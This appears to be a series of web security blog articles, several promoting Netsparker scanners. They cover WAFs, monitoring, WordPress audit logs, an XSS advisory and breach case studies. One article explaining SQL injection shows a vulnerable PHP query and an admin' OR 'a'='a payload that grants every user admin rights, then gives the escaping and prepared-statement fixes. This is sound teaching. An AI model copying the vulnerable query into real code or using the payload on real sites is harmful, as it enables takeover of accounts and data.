That being said, a firewall will only be able to analyse network traffic, which is why implementing a Web Application Firewall is a must if you are hosting a web application. WAFs are best suited to identifying malicious requests that are being sent to a web server. If the WAF identifies an SQL Injection payload in a request it will drop that request before it reaches the web server. Meanwhile if a WAF is not able to intercept these requests, you may also set up custom rules depending on the requests that need to be blocked. If you are wondering which requests you can block even before your WAF can, take a look at our next tip.

5. Performing Web Vulnerability Scans

web vulnerability scansNo amount of code reviews and updates can ensure that the end product is not vulnerable and cannot be exploited. Code reviews are limited since the executed code is not being analysed, which is why web vulnerability scanning is essential. Web scanners will view the web application as a black box, where they will be analysing the finished product, which is not possible with white box scanning or code reviews. Meanwhile, some scanners will also provide you with the option to perform grey box scanning, by combining website scans and a backend agent that can analyse code.

As complex and large as web applications are nowadays, it would be easy to miss certain vulnerabilities while performing a manual penetration test. Web vulnerability scanners will automate this process for you, thereby being able to cover a larger website in less time, while being able to detect most known vulnerabilities. One notorious vulnerability that is difficult to identify is DOM-based XSS, although web scanners are still able to identify such vulnerabilities. Web vulnerability scanners will also provide you with requests that you need to block on your Web Application Firewall (WAF), while you are working to fix these vulnerabilities.

6. Importance Of Monitoring

application monitoring alertsIt is imperative to know if your web application has been subjected to an attack. Monitoring the web application, and the server hosting it, would be the best way to ensure that even if an attacker gets past your defence systems, at least you will know how, when and from where it happened. There may be cases when a website is brought offline due to an attack and the owner would not even know about the incident but will find out after precious time has passed.

To avoid this you can monitor server logs, for example enabling notifications to be triggered when a file is deleted or modified. This way, if you had not modified that particular file, you will know that someone else has unauthorised access to your server. You can also monitor uptime which comes in handy when the attack is not as stealthy as modifying files, such as when your web server is subject to a Denial of Service attack. Such utilities will notify you as soon as your website is down, without having to discover the incident from users of your website.

The worst thing you can do when implementing monitoring services would be to base them on the same web server that is to be monitored. If this server was knocked down, the monitoring service will not be available to notify you.

7. Never Stop Learning

Finally, whatever you currently know about web security it’s never enough. Never stop learning about improving your web application’s security because literally every day brings a new exploit that may be used against your website. Zero day attacks happen out of the blue, which is why keeping yourself updated with any new security measures that you can implement is imperative. You can find such information from multiple web security blogs that detail how a website administrator should enforce their website’s security.

  • Hits: 24966

WordPress Audit Trail: Monitor Changes & Security Alerts For WordPress Blogs, Websites, e-Shops - Regulatory Compliance

wordpress-audit-trail-log-site-security-alerts-1aMonitoring, Auditing and obtaining Security Alerts for websites and blogs based on popular CMS systems such as WordPress, has become a necessity. Bugs, security exploits and security holes are being continuously discovered for every WordPress version making monitoring and auditing a high security priority. In addition, multi-user environments are often used for large WordPress websites, making it equally important to monitor WordPress user activity.

Users with different privileges can login to the website’s admin pages and publish content, install a plugin to add new functionality to the website, or change a WordPress theme to change the look and feel of the website. From the admin pages of WordPress users can do anything, including taking down the website for maintenance, depending on their privileges.

The Need to Keep a Log of What is Happening on Your WordPress

Every type of multi-user software keeps an audit trail that records all user activity on the system. And, since modern business websites have become fully blown multi-user web applications, keeping a WordPress audit trail is a critical and must do task. A default installation of WordPress does not have an audit trail, but the good news is that there are plugins such as WP Security Audit Log that allow you to keep an audit trial of everything that is happening on your WordPress.

wordpress-audit-trail-log-site-security-alerts-1Figure 1. Plugins like WP Security Audit Log provide detail tracking of all necessary events (click to enlarge)

There are several advantages to keeping track of all the changes that take place on your WordPress website in an audit trail. Here are just a few:

Keep Track Of Content & Functionality Changes On Your WordPress

By keeping a WordPress audit trail you can find out who did what on your WordPress website. For example; who published an article, or modified existing and already published content of an article or a page, installed a plugin, changed the theme or modified the source code of a file.

 Searching for specific events in WordPress Security Audit Log

Figure 2. Searching for specific events in WordPress Security Audit Log (click to enlarge)

Be Alerted to Suspicious Activity on Your WordPress

By keeping a WordPress Audit trail you can also be alerted to suspicious activity on your WordPress at an early stage, thus thwarting possible hack attacks. For example, when a WordPress is hacked, typically the attackers reset a user’s password or create a new account to login to WordPress. By using an add-on such as Email Notifications you can create specific rules so when important changes happen on your WordPress they are logged and you are notified via email.

wordpress-audit-trail-log-site-security-alerts-3 Figure 3. WP Security Audit Log: Creating customized email alerts for your WordPress site

Ensure the Productivity of Your Users & Employees

Nowadays many businesses employ remote workers. As much as businesses benefit by employing remote workers, there are disadvantages. For example, while the activity of employees who work from the office can be easily tracked, that of remote workers cannot. Therefore if your business website is powered by WordPress, when you install a WordPress audit trail plugin you can keep track of everything your web team is doing on the website, including the login and logout times, and location.

Ensure Your Business WordPress Websites Meet Mandatory Regulatory Compliance Requirements

If you have an online business, or if you are any sort of business via your WordPress website, there is a number of regulatory compliance requirements your website needs to adhere to, such as the PCI DSS. One common requirement these regulatory compliance requirements have is logs. As a website owner you should keep a log, or audit trail, of all the activity that is happening on your website.

Ease WordPress Troubleshooting

If you already have experience managing a multi-user system, you know that if something breaks down users will never tell you what they did. This is common, especially when administering customers’ websites. The customer has administrative access to WordPress. Someone installs a plugin, the website goes haywire yet it is no one’s fault. By keeping a WordPress audit trail you can refer to it and easily track any website changes that took place, thus making troubleshooting really easy.

Keep A WordPress Audit Trail

There are several other advantages when you keep a WordPress audit trail to keep a record of all the changes that take place on your WordPress site, such as having the ability to generate reports to justify your charges. The list of advantages can be endless but the most important one is security. Typically overlooked, logging also helps you ensure the long term security of your WordPress website.

 

  • Hits: 18395

Understanding SQL Injection Attacks & How They Work. Identify SQL Injection Code & PHP Caveats

Introduction-to-SQL-Injection-01SQL Injections have been keeping security experts busy for over a decade now as they continue to be one of the most common type of attacks against webservers, websites and web application servers. In this article, we explain what a SQL injection is, show you SQL injection examples and analyse how these type of attacks manage to exploit web applications and webservers, providing hackers access to sensitive data.

Additional interesting Web Hacking and Web Security content:

What Is A SQL Injection?

Websites operate typically with two sides to them: the frontend and backendThe frontend is the element we see, the rendered HTML, images, and so forth.  On the backend however, there are layers upon layers of systems rendering the elements for the frontend. One such layer, the database, most commonly uses a database language called SQL, or Structured Query Language. This standardized language provides a logical, human-readable sentence to perform definition, manipulation, or control instructions on relational data in tabular form. The problem, however, is while this provides a structure for human readability, it also opens up a major problem for security.

Typically, when data is provided from the frontend to the backend of a website – e.g. an HTML form with username and password fields – this data is inserted into the sentence of a SQL query. This is because rather than assign that data to some object or via a set() function, the data has to be concatenated into the middle of a string. As if you were printing out a concatenated string of debug text and a variable’s value, SQL queries work in much the same way. The problem, however, is because the database server, such as MySQL or PostgreSQL, must be able to lexically analyse and understand the sentence’s grammar and parse variable=value definitions. There must exist certain specific requirements, such as wrapping string values in quotes. A SQL injection vulnerability, therefore, is where unsanitized frontend data, such as quotation marks, can disrupt the intended sentence of a SQL query.

How Does A SQL Injection Work?

So what does “disrupt the intended sentence of a SQL query” mean? A SQL query reads like an English sentence:

Take variable foo and set it to ‘bar’ in table foobar.
Notice the single-quotes around the intended value, bar. But if we take that value, add a single quote and some additional text, we can disrupt the intended sentence, creating two sentences that change the entire effect. So long as the database server can lexically understand the sentence, it is none the wiser and will happily complete its task.  So what would this look like?

If we take that value bar and change it to something more complex – bar’ in table foobar. Delete all values not equal to ‘ – it completely disrupts everything. The sentence is thus changed as follows:

Take variable foo and set it to ‘bar’ in table foobar. Delete all values not equal to ‘’ in table foobar.

Notice how dramatically this disrupts the intended sentence? By injecting additional information, including syntax, into the sentence, the entire intended function and result has been disrupted to effectively delete everything in the table, rather than just change a value.

What Does A SQL Injection Look Like?

In code form, a SQL injection can find itself in effectively any place a SQL query can be altered by the user of a web application. This means things like query strings e.g: example.com/?this=query_string, form content (such as a comments section on a blog or even a username & password input fields on a login page), cookie values, HTTP headers (e.g. X-FORWARDED-FOR), or practically anything else.  For this example, consider a simple query string in PHP:

Request URI: /?username=admin
 
1.  $user = $_GET['username'];
2.  mysql_query("UPDATE tbl_users SET admin=1 WHERE username='$user'");

First, we will break this down a bit.

On line #1, we set the value of the username field in the query string to the variable $user.

On line #2, we insert that variable’s value into the query string’s sentence. Substituting the variable for the value admin in the URI, the database query would ultimately be parsed as follows by MySQL:

UPDATE tbl_users SET admin=1 WHERE username='admin'

However, a lack of basic sanitization opens this query string up to serious consequences. All an attacker must do is put a single quote character in the username query string field in order to alter this sentence and inject whatever additional data he or she would like.

Here is an example of what this would look like:

Request URI: /?username=admin' OR 'a'='a
 
1.  $user = $_GET['username'];
2.  mysql_query("UPDATE tbl_users SET admin=1 WHERE username='$user'");

Now, with this altered data, here is what MySQL would see and attempt to evaluate:

UPDATE tbl_users SET admin=1 WHERE username='admin' OR 'a'='a'

Notice, now, that if the letter A equals the letter A (basically true=true), all users will be set to admin status.

Ensuring Code is Not Vulnerable to SQL Injection Vulnerabilities

If we were to add a function, mysql_real_escape_string() for example, on line #1, that would prevent this particular variable from being vulnerable to a SQL injection. In practice, it would look like this:

Request URI: /?username=admin' OR 'a'='a                                                                                                                                                            1.  $user = mysql_real_escape_string($_GET['username']);
2.  mysql_query("UPDATE tbl_users SET admin=1 WHERE username='$user'");

This function escapes certain characters dangerous to MySQL queries, by prefixing those characters with backslashes. Rather than evaluate the single quote character literally, MySQL understands this prefixing backslash to mean do not evaluate the single quote. Instead, MySQL treats it as part of the whole value and keeps going.  The string, to MySQL, would therefore look like this:


UPDATE tbl_users SET admin=1 WHERE username='admin\' OR \'a\'=\'a'

Because each single quote is escaped, MySQL considers it part of the whole username value, rather than evaluating it as multiple components of the SQL syntax. The SQL injection is thus avoided, and the intention of the SQL sentence is thus undisrupted.

Caveat: For these examples, we used older, deprecated functions like mysql_query() and mysql_real_escape_string() for two reasons:

1.    Most PHP code still actively running on websites uses these deprecated functions;
2.    It allows us to provide simple examples easier for users to understand.

However, the right way to do it is to use prepared SQL statements. For example, the prepare() functions of the MySQLi and PDO_MySQL PHP extensions allow you to format and assemble a SQL statement using directive symbols very much like a sprintf() function does. This prevents any possibility of user input injecting additional SQL syntax into a database query, as all input provided during the execution phase of a prepared statement is sanitized.  Of course, this all assumes you are using PHP, but the idea still applies to any other web language.

SQL Injection Is The Most Widely Exploited Vulnerability

Even though it has been more than sixteen years since the first documented attack of SQL Injection, it is still a very popular vulnerability with attackers and is widely exploited. In fact SQL Injection has always topped the OWASP Top 10 list of most exploited vulnerabilities.

  • Hits: 12751

Web Application Security Interview on Security Weekly – Importance of Automated Web Application Security

netsparker-importance-of-automated-web-application-scannerA few weeks back Security Weekly interviewed Ferruh Mavituna, Netsparker’s CEO and Product Architect. Security Weekly is a popular podcast that provides free content within the subject matter of IT security news, vulnerabilities, hacking, and research and frequently interviews industry leaders such as John Mcafee, Jack Daniel and Bruce Schneier.

During the 30 minutes interview, Security Weekly’s host Paul Asadoorian and Ferruh Mavituna highlight how important it is to use an automated web application security scanner to find vulnerabilities in websites and web applications. They also briefly discuss web application firewalls and their effectiveness, and how Netsparker is helping organizations improve their post scan process of fixing vulnerabilities with their online web application security scanner Netsparker Cloud.

Paul and Ferruh covered several other aspects of web application security during this interview, so if you are a seasoned security professional, a developer or a newbie it is a recommended watch.  

To view the interview, click on the image below:

netsparker-ceo-interview-importance-of-automated-web-application-scanner
Figure 1. Netsparker CEO explains the importance of automated web application security scanners

  • Hits: 8538

WordPress DOM XSS Cross-site Scripting Vulnerability Identified By Netsparker

netsparker-discovery-wordpress-dom-xss-scripting-vulnerability-18th of May 2015, Netsparker annouced yesterday the discovery of critical security vulnerability contained an HTML file found on many WordPress themes, including WordPress.org hosted websites. As reported by Netsparker the specific HTML file is vulnerable to cross-site scripting attacks and session hijack. WordPress.org has already issued an official annoucement and patch (v4.2.2) and recommends WordPress administrators update their website files and themes.

The Genericons icon font package, which is used in a number of popular themes and plugins, contained an HTML file vulnerable to a cross-site scripting attack. All affected themes and plugins hosted on WordPress.org (including the Twenty Fifteen default theme) have been updated yesterday by the WordPress security team to address this issue by removing this nonessential file. To help protect other Genericons usage, WordPress 4.2.2 proactively scans the wp-content directory for this HTML file and removes it. Reported by Robert Abela of Netsparker.

By exploiting a Cross-site scripting vulnerability the attacker can hijack a logged in user’s session. This means that the malicious hacker can change the logged in user’s password and invalidate the session of the victim while the hacker maintains access. As seen from the XSS example in Netsparker's article, if a web application is vulnerable to cross-site scripting and the administrator’s session is hijacked, the malicious hacker exploiting the vulnerability will have full admin privileges on that web application.

Related Security Articles

  • Hits: 10756

Choosing a Web Application Security Scanner - The Importance of Using the Right Security Tools

choosing-web-application-security-scanner-1In the world of information security there exist many tools, from small open source products to full appliances to secure a system, a network, or an entire corporate infrastructure.  Of course, everyone is familiar with the concept of a firewall – even movies like Swordfish and TV shows like NCIS have so very perfectly described, in riveting detail, what a firewall is.  But there are other, perhaps less sexy utilities in a security paradigm.

Various concepts and security practices – such as using complex passphrases, or eschewing passphrases entirely, deeply vetting email sources, safe surfing habits, etc. – are increasingly growing trends among the general workforce at large, especially with the ubiquity of computers at every desk.  But security in general is still unfortunately looked at as an afterthought, even when a lack thereof begets massive financial loss at a seemingly almost daily level.

Security engineers are all too often considered an unnecessary asset, simply a menial role anybody can do; A role that can be assumed as yet another hat worn by developers, system administrators, or, well, perhaps just someone who only shows a modest capability with Excel formulas.  Whatever the reason for such a decision, be it financial or otherwise, the consequences can be severe and long-lasting.  Sony underestimated the value of a strong and well-equipped security team multiple times, choosing to forego a powerful army in lieu of a smaller, less outfitted and, thus, thinner stretched but cheaper alternative.  This, in turn, yielded among the largest multiple security breaches to ever be seen, especially by a single corporation.  Were their security department better outfitted with the right tools, it is quite possible those events would have played out entirely different.

Using The Right Security Tools

So, what constitutes “the right tools”?  Many things.  A well-populated team of capable security engineers certainly can be considered a valuable tool in building a strong security posture within an infrastructure.  But, more specifically and very critically, it is what assets those engineers have at their disposal that may mean the difference between a minor event that never even makes it outside the corporate headquarters doors, and a major event that results in a corporation paying for identity theft protection for millions of customers.  Those tools of course vary widely depending on the organization, but one common element they all do – or at least absolutely should – share is a web application security scanner.

What Is A Web Application Security Scanner?

A website that accepts user input in any form, be it URL values or submitted content, is a complex beast.  Not only does the content an end user provides change the dynamics of the website, but it even has the potential to cripple that website if done maliciously and left unprotected against.  For every possibility of user content, the amount of potential attack vectors increases on a magnitude of near infinity.  It is literally impossible for a security engineer, or even team thereof, to account for all these possibilities by hand and, especially, test them for known or unknown vulnerabilities.

Web scanners exist for this very purpose, designed carefully to predict potential and common methods of attack, then brute-force test them to find any possibility of an existing vulnerability.  And they do this at a speed impossible for humans to replicate manually.  This is crucial for many reasons, namely that it saves time, it is thorough and comprehensive, and, if designed well, adaptive and predictive to attempt clever methods that even the most skilled security engineer may not immediately think of.  Truly, not using a web security scanner is only inviting potentially irreparable harm to a web application and even the company behind it.  But the question remains: Which web scanner works the best?

Options Galore - How To Choose Which Web Scanner Is Right For You

choosing-web-application-security-scanner-2Many websites and web applications are like a human fingerprints, with no two being alike.  Of course, many websites may use a common backend engine – Wordpress, an MVC framework like Laravel or Ruby on Rails, etc. – but the layers on top of those engines, such as plugins or custom coded additions, are often a quite unique collection. 

The backend engine is also not the only portion to be concerned with.  Frontend vulnerabilities may exist with each of these layers, such as cross-site scripting, insecurely implemented jQuery libraries, and add-ons, poor sanitization against AJAX communication models, and many more.  Each layer presents another nearly endless array of input possibilities to test for vulnerabilities.

A web scanner needs to be capable of digging through these unique complexities and provide accurate, reliable findings.  False positives can waste an engineer’s time, or worse, send a development team on a useless chase to perform unit tests, wasted looking for a falsely detected vulnerability.  And if the scanner is difficult to understand or provides little understanding of the detected vulnerabilities, it makes for a challenging or undesirable utility that may go unused.  Indeed, a well-designed web security scanner that delivers on all fronts is an important necessity for a strong security posture and a better secured infrastructure.

Final Thoughts

There is no one perfect solution that will solve all problems and completely secure your website such that it becomes impenetrable.  Further, a web security scanner will only be as effective as the security engineers or developers fixing all flaws it finds.  A web security scanner is only the first of many, many steps, but it indeed is an absolutely critical one for a powerful security posture.

Indeed, we keep returning to that phrase – security posture – because it is a perfectly analogous way to look at web application, system, and infrastructure security for both what it provides and what is required for good posture: a strong backbone.  Focused visibility and a clear view of paths over obstructions is not possible with a slouched posture.  Nothing will provide that vision as clearly as a web security scanner will, and no backbone is complete without a competent and useful web security scanning solution at its top.

  • Hits: 15366

Comparing Netsparker Cloud-based and Desktop-based Security Software solutions – Which solution is best for you?

If you are reading this you have heard about the Cloud Computing. If not, I would be worried! Terms such as Cloud Computing, Software as a Service, Cloud Storage has become a permanent fixture in adverts, marketing content and technical documentation.

Many Windows desktop software applications have moved to the “cloud”. Though, even though the whole industry wants you and your data in the cloud, have you ever looked into the pros and cons of the cloud? Does it make sense to go into that direction?

Let’s use web application security scanners as an example, software that is used to automatically identify vulnerabilities and security flaws in websites and web applications. Most, if not all of the industry leading vendors have both a desktop edition and an online service offering. In fact Netsparker just launched their all new service offering; Netsparker Cloud, the online false positive free web application security scanner. In such case which one should you go for?

As clearly explained in Netsparker Desktop VS Netsparker Cloud both web security solutions are built around the same scanning engine, hence their vulnerability detection capabilities are the same. The main differences between both of them are the other non-scan related features, which also define the scope of the solution.

cloud-based-vs-desktop-based-security-solutions-1Figure 1. Netsparker Cloud-based Security Sanner (Click to enlarge)

For example Netsparker Desktop is ideal for small teams, or security professionals who work on their own and have a small to medium workload. On the other hand Netsparker Cloud is specifically designed for organizations which run and manage a good number of websites and maybe even have their own team of developers and security professionals. It is a multi–user platform, has a vulnerability tracking solution (a system that is similar to a normal bug tracking solution but specifically designed for web application vulnerabilities) and it is fully scalable, to accommodate the simultaneous scanning of hundreds and thousands of web applications.

cloud-based-vs-desktop-based-security-solutions-2Figure 2. Netsparker Desktop-based Security Sanner (Click to enlarge)

Do not just follow the trend, inform yourself. Yes, your readings might be flooding with cloud related terms, the industry is pushing you to move your operations to the cloud as it is cheaper and more reliable, but as clearly explained in the desktop vs cloud web scanner comparison, both solutions still have a place in today’s industry.

  • Hits: 15305

The Importance of Automating Web Application Security Testing & Penetration Testing

automation-web-application-security-testing-1Have you ever tried to make a list of all the attack surfaces you need to secure on your networks and web farms? Try to do it and there will be one thing that will stand out; keeping websites and web applications secure. We have firewalls, IDS and IPS systems that inspect every packet that reaches our servers and are able to drop it should it be flagged as malicious, but what about web applications?

Web application security is different than network security. When configuring a firewall you control who accesses what, but when it comes to web application security you have to allow everybody in, including the bad guys and expect that everyone plays by the rules. Hence web applications should be secure; web application security should be given much more attention and considering the complexity of today’s web applications, it should be automated.

Let’s dig in deep in this subject and see why it needs to be automated.

Automated Web Security Testing Saves Time

Also known as Penetration Testing or “pen testing”, this is the process by which a security engineer or “pen tester” applies a series of injection or vulnerability tests against areas of a website that accept user input to find potential exploits and alert the website owner before they get taken advantage of and become massive headaches or even financial losses. Common places for this can include user data submission areas such as authentication forms, comments sections, user viewing configuration options (like layout selections), and anywhere else that accepts input from the user. This can also include the URL itself, which may have a Search Engine Optimization-friendly URI formatting system.

Most MVC frameworks or web application suites like WordPress offer this type of URI routing. (We differentiate a URL and URI. A URL is the entire address, including the http:// portion, the entire domain, and everything thereafter; whereas the URI is the portion starting usually after the domain (but sometimes including, for context), such as /user/view/123 or test.com/articles/123.)

For example, your framework may take a URI style as test.com/system/function/data1/data2/, where system is the controlling system you wish to invoke (such as an articles system), function is the action you wish to invoke (such as read or edit), and the rest are data values, typically in assumed positions (such as year/month/article-title).

Each of these individual values require a specific data type, such as a string, an integer, a certain regular expression match, or infinite other possibilities. If data types are not strictly enforced, or – sadly as often as this really does happen – user-submitted data is properly sanitized, then a hacker can potentially gain information to get further access, if not even force direct backdoor access via a  SQL injection or a remote file inclusion. Such vulnerabilities are such a prevalent and consistent threat, that for example SQL Injection has made it to the OWASP Top 10 list for over 14 years.

There exist potentially millions, billions, or more combinations of various URIs in your web application, including ones it may not support by default or even to your knowledge. There could be randomphpinfo(); scripts publicly accessible that mistakenly got left in by a developer, an unchecked user input somewhere, some file upload system that does not properly prevent script execution – any random number of possibilities. No security engineer or his team can reasonably assume for or test all of these possibilities. And black-hat hackers know all this too, sometimes better than those tasked to protect against these threats.

Automation Isn’t Just Used By The Good Guys

automation-web-application-security-testing-2Many automated security tools exist not to test and find security holes, but to exploit them when found. Black-hat hackers intent on disrupting your web application possess automated suites as well, because they too, know a manual approach is a waste of time (that is, until they find a useful exploit, and by then it’s sometimes too late).

Some utilities, like Slowloris, exist to exploit known weaknesses in common web services, like the Apache web server itself. Others pray on finding opportunity in the form of insecure common web applications – older versions of Wordpress, phpBB, phpMyAdmin, cPanel, or other frequently exploited web applications. There exist dozens of categorical vulnerabilities, each with thousands or millions of various attack variants. Looking for these is a daunting task.

As quickly as you can spin up a web application, a hacker can automatically scan it and possibly find vulnerabilities. Leveraging an automated web application vulnerability scanner like Netsparker or Netsparker Cloud provides you the agility and proactivity to find and prevent threats before they become seriously damaging problems. This holds especially true for complex web applications such as large forum systems, blogging platforms and custom web applications. The more possibility for user submitted data and functionality, the more opportunity for vulnerabilities to exist and be exploited. And remember, this changes again for every new version of the web application you install. A daunting task, indeed.

Without automation of web application security testing, a true strong security posture is impossible to achieve. Of course, many other layers ultimately exist – least-privilege practice, segregated (jail, chroot, virtual machine) systems, firewalls, etc. – but if the front door is not secure, what does it matter if the walls are impenetrable? With the speed afforded by automation, a strong and capable web vulnerability scanner, and of course patching found flaws and risks, security testing guarantees as best as reasonably possible that the front door to your web application and underlying infrastructure remains reinforced and secure.

  • Hits: 17566

Statistics Highlight the State of Security of Web Applications - Many Still Vulnerable to Hacker Attacks

state-of-security-of-web-applications-1Netsparker use open source web applications such as Twiki for a total different purpose than what they were intended for. They used them to test their own web application security scanners.

Netsparker need to ensure that their scanners are able to crawl and identify attack surfaces on all sort of web applications, and identify as much vulnerabilities as possible. Hence they frequently scan open source web applications. They use open source web applications as a test bed for their crawling and scanning engine.

Thanks to such exercise Netsparker are also helping developers ship more secure code, since they report their findings to the developers and sometimes also help them remediate the issue. When such web application vulnerabilities are identified Netsparker release an advisory and between 2011 and 2014 Netsparker published 87 advisories.

state-of-security-of-web-applications-2

A few days ago Netsparker released some statistics about the 87 advisories they published so far. As a quick overview, from these statistics we can see that cross-site scripting is the most common vulnerability in the open source web applications that were scanned. Is it a coincidence? Not really.

The article also explains why most probably many web applications are vulnerable to this vulnerability, which made it to the OWASP Top 10 list ever since.

The conclusion we can draw up from such statistics is quite predictable, but at the same time shocking. There is still a very long way to go in web application security, i.e. web applications are still poorly coded, making them an easy target for malicious hacker attacks.

  • Hits: 14777

The Implications of Unsecure Webservers & Websites for Organizations & Businesses

implications-of-unsecure-webservers-websites-1Long gone are the days where a simple port scan on a company’s webserver or website was considered enough to identify security issues and exploits that needed to be patched. With all the recent attacks on websites and webservers which caused millions of dollars in damage, we thought it would be a great idea to analyze the implications vulnerable webservers and websites have for companies, while providing useful information to help IT Departments, security engineers and application developers proactively avoid unwanted situations.

Unfortunately companies and webmasters turn their attention to their webservers and websites, after the damage is done, in which case the cost is always greater than any proactive measures that could have been taken to avoid the situation.

Most Security Breaches Could Have Been Easily Prevented

Without doubt, corporate websites and webservers are amongst the highest preference for hackers. Exploiting well-known vulnerabilities provides them with easy-access to databases that contain sensitive information such as usernames, passwords, email addresses, credit & debit card numbers, social security numbers and much more.

The sad part of this story is that in most cases, hackers made use of old exploits and vulnerabilities to scan their targets and eventually gain unauthorized access to their systems.

Most security experts agree that if companies proactively scanned and tested their systems using well-known web application security scanner tools e.g Netsparker, the security breach could have been easily avoided. The Online Trust Alliance (OTA) comes to also confirm this as they analyzed thousands of security breaches that occurred in the first half of 2014 and concluded that these could have been easily prevented. [Source: OTA Website]

Tools such as Web Application Vulnerability Scanners are used by security professionals to automatically scan websites and web applications for hidden vulnerabilities.

When reading through recent security breaches, we can slowly begin to understand the implications and disastrous effects these had for companies and customers. Quite often, the figure of affected users who’s information was compromised, was in the millions. We should also keep in mind that in many cases, the true magnitude of any such security incident is very rarely made known to the public.

Below are a few of the biggest security data breaches which exposed an unbelievable amount of information to hackers:

 eBay.com – 145 Million Compromised Accounts

implications-of-unsecure-webservers-websites-2In late February – early March 2014, the eBay database that held customer names, encrypted passwords, email addresses, physical addresses, phone numbers, dates of birth and other personal information, was compromised, exposing sensitive information to hackers. [Source:  bgr.com website]

JPMorgan Chase Bank – 76 Million Household Accounts & 7 Million Small Business

implications-of-unsecure-webservers-websites-3In June 2014, JPMorgan Chase bank was hit badly and had sensitive personal and financial data exposed for over 80 million accounts. The hackers appeared to obtain a list of the applications and programs that run on the company’s computers and then crosschecked them with known vulnerabilities for each program and web application in order to find an entry point back into the bank’s systems.
[Source: nytimes.com website]

Find security holes on your websites and fix them before they do by scanning your websites and web applications with a Web Application Security Scanner.

Forbes.com – 1 Million User Accounts

implications-of-unsecure-webservers-websites-4In February 2014, the Forbes.com website was succumbed to an attack that leaked over 1 million user accounts that contained email addresses, passwords and more.  The Forbes.com Wordpress-based backend site was defaced with a number of news posts. [Source: cnet.com website]

Snapchat.com – 4.6 Million Username Accounts & Phone numbers

implications-of-unsecure-webservers-websites-5In January 2014, Snapchat’s popular website had over 4.6 million usernames and phone numbers exposed due to a brute force enumeration attack against their Snapchat API. The information was publicly posted on several other sites, creating a major security concern for Snapchat and its users.
[Source: cnbc.com website]

USA Businesses: Nasdaq, 7-Eleven and others – 160 Million Credit & Debit Cards

implications-of-unsecure-webservers-websites-6In 2013 a massive underground attack was uncovered, revealing that over 160 million credit and debit cards were stolen during the past seven years. Five Russians and Ukrainians used advanced hacking techniques to steal the information during these years.  Attackers targeted over 800,000 bank accounts and penetrated servers used by the Nasdaq stock exchange.
[Source: nydailynews.com website]

AT&T - 114,000 iPad Owners (Includes White House Officers, US Senate & Military Officials)

implications-of-unsecure-webservers-websites-7In 2010, a major security breach on AT&T’s website compromised over 114,000 customer accounts, revealing names, email addresses and other information. AT&T acknowledged the attack on its webservers and commented that the risk was limited to the subscriber’s email address.  
Amongst the list were apparently officers from the White House, member of the US Senate, staff from NASA, New York Times, Viacom, Time Warner, bankers and many more. [Source: theguardian.com website]

Target  - 98 Million Credit & Debit Cards Stolen

implications-of-unsecure-webservers-websites-8In 2013, during the period 27th of November and 15th of December more than 98 million credit and debit card accounts were stolen from 1,787 Target stores across the United States. Hackers managed to install malware on Target’s computer systems to capture customers cards and then installed an exfiltration malware to move stolen credit card numbers to staging points around the United States in order to cover their tracks. The information was then moved to the hackers computers located in Russia.

The odd part in this security breach is that the infiltration was caught by FireEye – the $1.6 million dollar malware detection tool purchased by Target, however according to online sources, when the alarm was raised at the security team in Minneapolis, no action was taken as 40 million credit card numbers and 70 million addresses, phone numbers and other information was pulled out of Target’s mainframes!  [Source: Bloomberg website]

SQL Injections & Cross-Site Scripting are one of the most popular attack methods on Websites and Web Applications. Security tools such as Web Vulnerability Scanners allow us to uncover these vulnerabilities and fix them before hackers exploit them.

Implications for Organizations & Businesses

It goes without saying that organizations suffer major damages and losses when it comes to security breaches. When the security breaches happens to affect millions of users like the above examples, it’s almost impossible to calculate an exact dollar ($) figure.

Security Experts agree that data security breaches are among the biggest challenges organizations face today as the problem has both financial and legal implications.

Business Loss is the biggest contributor to overall data breach costs and this is because it breaks down to a number of other sub-categories, of which the most important are outlined below:

  • Detection of the data breach. Depending on the type of security breach, the business can lose substantial amounts of money until the breach is successfully detected. Common examples are defaced website, customer orders and credit card information being redirected to hackers, orders manipulated or declined.
  • Escalation Costs. Once the security breach has been identified, emergency security measures are usually put into action. This typically involves bringing in Internet security specialists, the cybercrime unit (police) and other forces, to help identify the source of the attack and damage it has caused. Data backups are checked for their integrity and everyone is on high-alert.
  • Notification Costs. Customers and users must be notified as soon as possible. Email alerts, phone calls and other means are used to get in contact with the customers and request them to change passwords, details and other sensitive information. The company might also need to put together a special team that will track and monitor customer responses and reactions.
  • Customer Attrition. Also known as customer defection. After a serious incident involving sensitive customer data being exposed, customers are more likely to stop purchasing and using the company’s services. Gaining initially a customer’s trust requires sacrifices and hard work – trying to re-gain it after such an incident means even more sacrifices and significantly greater costs. In many cases, customers choose to not deal with the company ever again, costing it thousands or millions of dollars.
  • Legal Implications. In many cases, customers have turned against companies after their personal information was exposed by a security breach. Legal actions against companies are usually followed by lengthy law suites which end up costing thousands of dollars, not to mention any financial compensation that will be awarded to the end customers.  One example is Target’s security breach mentioned previously which is now facing multiple lawsuits from customers.

As outlined previously, the risk for organizations is high and there are a lot in stake from both, financial and legal prospective.  The security breach examples mentioned in this article make a good point on how big and serious a security breach can become, but also the implications for companies and customers. Our next article will focus on guidelines that can help us prevent data breaches and help our organization, company or business to deal with them.

  • Hits: 30066

The Importance of Monitoring and Controlling Web Traffic in Enterprise & SMB Networks - Protecting from Malicious Websites - Part 1

security-protect-enterprise-smb-network-web-monitoring-p1-1This article expands on our popular security articles (Part 1 & Part 2) that covered the importance of patching enterprise and SMB network systems to protect them from hijacking, hacking attempts, unauthorized access to sensitive data and more. While patching systems is essential, another equally important step is the monitoring of Web traffic to control user activity on the web and prevent users from accessing dangerous sites and Internet resources that could jeopardize the company’s security.

The ancient maxim – prevention is better than cure – holds good in cyberspace as well, and it is prudent to detect beforehand signs of trouble, which if allowed to continue, might snowball into something uncontrollable. One of the best means of such prevention is through monitoring web traffic and to locate potential sources of trouble.

Even if attackers are unable to gain access to your network, they can still hold you to ransom by launching a Distributed Denial of Service or DDoS attack, wherein they choke the bandwidth of your network. Regular customers will not be able to gain access to your servers. Generally downtime for any company these days translates to loss of income and damage to the company’s reputation. Attackers these days might also refuse to relent until a ransom amount is paid up. Sounds a bit too far-fetched? Not really.

Live Attacks & Hacking Attempts On The Internet

It’s hard to image what really is happening right now on the Internet: How many attacks are taking place, the magnitude of these attacks, the services used to launch attacks, attack origins, attack targets and much more.  Hopefully we’ll be able to help change than for you right now…

The screenshot below was taken after monitoring the Norse network which collects and analyzes live threat intelligence from darknets in hundreds of locations in over 40 countries. The attacks are taken from a small subset of live flows against the Norse honeypot infrastructure and represent actual worldwide cyber-attacks:

security-protect-enterprise-smb-network-web-monitoring-p1-2aClick to enlarge

